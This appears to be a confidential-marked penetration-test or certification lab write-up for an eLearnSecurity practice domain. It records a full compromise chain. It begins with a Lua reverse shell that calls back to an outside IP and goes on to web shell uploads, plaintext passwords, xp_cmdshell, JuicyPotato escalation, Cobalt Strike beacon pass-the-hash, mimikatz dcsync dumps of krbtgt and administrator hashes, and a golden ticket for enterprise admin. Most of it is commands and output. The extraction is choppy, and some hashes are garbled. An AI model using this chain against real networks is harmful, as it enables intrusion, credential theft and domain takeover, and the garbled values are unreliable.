1. 10.100.11.

101

1 – I opened the https://172.16.80.100

2 – add this code

local host, port = "175.12.80.12", 1111 local socket = require("socket")

local tcp = socket.tcp() local io = require("oi") tcp:connect(host, port);
while true do local cmd, status, partial = tcp:receive() local f =
io.popen(cmd, 'w') local s = f:read("a") f:close() tcp:send(s) if status ==
"closed" then break end end tcp:close()

This gave me a shell access

Downloaded and executed my beacon

Create socks and use proxychains

Found UAT Helpdesk App.url

Which contained the following URL http://uat-helpdesk.els-child.els.local/admin/default.aspx
2. 10.100.11.100
The server at http://10.100.11.100 include admin panel with admin:admin
credentials

From there upload shell

Dump data you get user manager1 with password Compl3xP@ssword

3. 10.100.11.150

Use manager1 to contact 10.100.11.150/admin/default.aspx

Used “uatoperator” account against 10.100.11.150

[11:16:47] root:examples git:(master) # proxychains mssqlclient.py

uatoperator@10.100.11.150

ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
SQL> enable_xp_cmdshell
[*] INFO(UATSERVER\DB1): Line 185: Configuration option 'show
advanced options' changed from 1 to 1. Run the RECONFIGURE statement
to install.

Document Classification: Confidential

[*] INFO(UATSERVER\DB1): Line 185: Configuration option

'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to
install.
SQL> xp_cmdshell whoami
output

--------------------------------------------------------------------
---

---------

nt service\mssql$db1
NULL
SQL>

Execute comands

Escalate with juicypotto

JuicyPotato.exe -l 1111 -p c:\users\payload.exe -t * -c {8BA3F05E- D86B-

21D0-A075-01C04FB68820}
Dump passwords from db
4. 10.100.11.250

Using the admin credentials I got from the db

11
To gain access to jumbox over wmic

Impersonated uat operator using make_token

Then started webserver at win10-server machine to host my payloads And started to execute
commands at jumpbox via invoke-command

12

beacon> link JUMPBOX.ELS-CHILD.ELS.LOCAL

[*] Tasked to link to 'JUMPBOX.ELS-CHILD.ELS.LOCAL' [+] host called
home, sent: 56 bytes
[+] established link to child beacon: 10.100.10.250

After gaining the shell access I tried to escalate my privs and managed to do so via reading
unattended install file which gave me administrator
5. 10.100.10.253

From jumpbox (10.100.11.100) and using uatoperator I started to execute commands over
wmi

I started webserver at jumpbox to host the payloads

I started to view the registry and found user administrator : B@dR3gistry

16 used it to escalate and dump hashes

beacon> dcsync els-child.els.local els-child\krbtgt
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:els-
child.els.local /user:els-child\krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els-child.els.local' will be the domain
[DC] 'child-dc01.els-child.eLS.local' will be the DC server
[DC] 'els-child\krbtgt' will be the user account

Object RDN

** SAM ACCOUNT **

: krbtgt

SAM Username
Account Type
User Account Control : Account expiration : Password last change :
Object Security ID : Object Relative ID : 502

Credentials: Hash NTLM: ntlm- 0: lm - 0:

e4ba51c7157fe411po603b661f1ccfbe e4ba51c7111fe46652603b661f1ccfbe
1389eb4be52e304d1a753a704187dd66

: krbtgt
: 30000000 ( USER_OBJECT )

00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) 11/3/2017 9:11:28 AM

S-1-5-21-235po937-599822933-351157107-502

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *

Default Salt : ELS-CHILD.ELS.LOCALkrbtgt Default Iterations : 4096

Credentials

aes256_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

aes128_hmac (4096) : 6031a48480cc6db341758e230e6d des_cbc_md5 (4096)

: 312a6bdfb09276c7

* Primary:Kerberos *
Default Salt : ELS-CHILD.ELS.LOCALkrbtgt Credentials

des_cbc_md5 : 312a6bd1j0276c7 * Packages *

Kerberos-Newer-Keys
* Primary:WDigest *
01 1cf79ec9db39ca3ui8979d9cca4bdef2
.................................. 28
829bb53e575583c3io7f40aabf43f05 29 0696af48622e71a7oi7cccc94c95d1b

6. 10.100.10.254

To gain access to the parent domain DC, I created a golden ticket using the krbtgt I got before
for my user adding him to the enterprise admins group

beacon> mimikatz kerberos::golden /user:admin1 /krbtgt:

1cf79ec9db39ca3ui8979d9cca4bdef2 /domain:els-child.els.local /sid:S-
1-5-21-23589937-1851e4348-351157107 /sids:S-1-5-21-22511948-
1856962338-1851e4348-519 /ticket:golden.ticket
[*] Tasked beacon to run mimikatz's kerberos::golden /user:admin1
/krbtgt: 1cf79ec9db39ca3ui8979d9cca4bdef2 /domain:els-
child.els.local /sid:S-1-5-21-23511937-599888933-351157107 /sids:S-
1-5-21-2128511948- 1856962338-15222442862-519 /ticket:golden.ticket
command

[+] host called home, sent: 998474 bytes [+] received output:

User
Domain
SID
User Id
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2128511948-1851e4348-1523442862-519 ;
ServiceKey: 1cf79ec9db39ca3ui8979d9cca4bdef2 - rc4_hmac_nt
Lifetime : 10/29/2019 5:08:32 PM ; 10/26/2029 5:08:32 PM ;
10/26/2029 5:08:32 PM

-> Ticket : golden.ticket

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !

: admin1
: els-child.els.local (ELS-CHILD)
: S-1-5-21-23589937-1851e4348-351157107 : 500

admin beacon> dcsync els.local els\krbtgt

[*] Tasked beacon to run mimikatz's @lsadump::dcsync
/domain:els.local /user:els\krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els.local' will be the domain
[DC] 'lab-dc01.eLS.local' will be the DC server
[DC] 'els\krbtgt' will be the user account

Object RDN

** SAM ACCOUNT **

SAM Username Account Type

User Account Control

Account expiration
Password last change
Object Security ID
Object Relative ID

: krbtgt

: krbtgt
: 30000000 ( USER_OBJECT )

: 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )

:
: 9/7/2017 1:06:33 PM
: S-1-5-21-2128511948-1856962338-1523442862-502 : 502

Credentials: Hash NTLM: ntlm- 0: lm - 0:

d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
f4f88438c968756e75252ca4056b0607
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

Document Classification: Confidential

19

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *

Default Salt : ELS.LOCALkrbtgt Default Iterations : 4096 Credentials

aes256_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

aes128_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
des_cbc_md5 (4096) : 57fb67328f4651a7

* Primary:Kerberos *
Default Salt : ELS.LOCALkrbtgt Credentials
des_cbc_md5 :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9 *
Packages *

Kerberos-Newer-Keys

* Primary:WDigest *
01 b4e712be7d587a19fe5b18b07a7ff799 ...........................
29 e1ac403d7b274c3d8c2e2c2d40ab7ccc

beacon> dcsync els.local els\administrator

[*] Tasked beacon to run mimikatz's @lsadump::dcsync
/domain:els.local /user:els\administrator command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els.local' will be the domain
[DC] 'lab-dc01.eLS.local' will be the DC server
[DC] 'els\administrator' will be the user account

Object RDN

** SAM ACCOUNT **

SAM Username

Account Type
User Account Control :

Account expiration
Password last change
Object Security ID
Object Relative ID

:
:
:
: 500

Credentials: Hash NTLM: ntlm- 0: ntlm- 1: lm - 0:

: Administrator
: Administrator
: 30000000 ( USER_OBJECT )

00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) 10/30/2017 9:21:01 AM

S-1-5-21-2128511948-1856962338-1523442862-500

49623ccc820121223b3f0f571b77186

Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : ELS.LOCALAdministrator Default Iterations : 4096
Credentials

Used administrator hash to gain access to the parent domain’s DC

beacon> pth els\administrator 49623ccc820121223b3f0f571b77186

[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:administrator
/domain:els /ntlm: 49623ccc820121223b3f0f571b77186/run:"%COMSPEC% /c
echo 749c6eaf8a2 > \\.\pipe\56de86" command
[+] host called home, sent: 746598 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : administrator
domain : els
program : C:\Windows\system32\cmd.exe /c echo 749c6eaf8a2 >
\\.\pipe\56de86
impers.: no
NTLM : 49623ccc820121223b3f0f571b77186

| PID 2052
| TID 2676
| LSA Process is now R/W
| LUID 0 ; 1632426 (00000000:0018e8aa)
\_ msv1_0 - data copy @ 0000004BBB9CA130 : OK ! \_ kerberos - data
copy @ 0000004BBB97F318

• \_ aes256_hmac -> null

• \_ aes128_hmac -> null \_ rc4_hmac_nt OK
\_ rc4_hmac_old OK

\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000004BBB9745C8 (16) -> null

beacon> ls \\lab-dc01.els.local\c$
[*] Tasked beacon to list files in \\lab-dc01.els.local\c$ [+] host
called home, sent: 41 bytes
[*] Listing: \\lab-dc01.els.local\c$\

Size Type ---- ----

dir

Last Modified Name ------------- ----

03/18/2014 03:33:36

$Recycle.Bin

bootmgr BOOTNXT milestone.txt pagefile.sys

beacon> wmi lab-dc01.els.local smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\lab-

dc01.els.local\pipe\status_6321) on lab-dc01.els.local via WMI

[+] host called home, sent: 208972 bytes
[-] Could not connect to pipe (\\lab-dc01.els.local\pipe\status_6321):
2 [+] established link to child beacon: 10.100.10.254

beacon> shell type milestone.txt

[*] Tasked beacon to run: type milestone.txt

[+] host called home, sent: 73 bytes

[*] started download of C:\milestone.txt (97 bytes)
[*] download of milestone.txt is complete
[+] received output:
It seems like i hacked the domain, by just compromising
elearnsecurity’s moderator’s ass. How cool is that?
beacon> shell hostname
[*] Tasked beacon to run: hostname
[+] host called home, sent: 39 bytes
[+] received output:
lab-dc01

beacon> shell ipconfig

[*] Tasked beacon to run: ipconfig

[+] host called home, sent: 39 bytes [+] received output:

Windows IP Configuration
Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::5574:a356:2968:b78b%12 IPv4
Address. . . . . . . . . . . : 10.100.10.254
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.100.10.1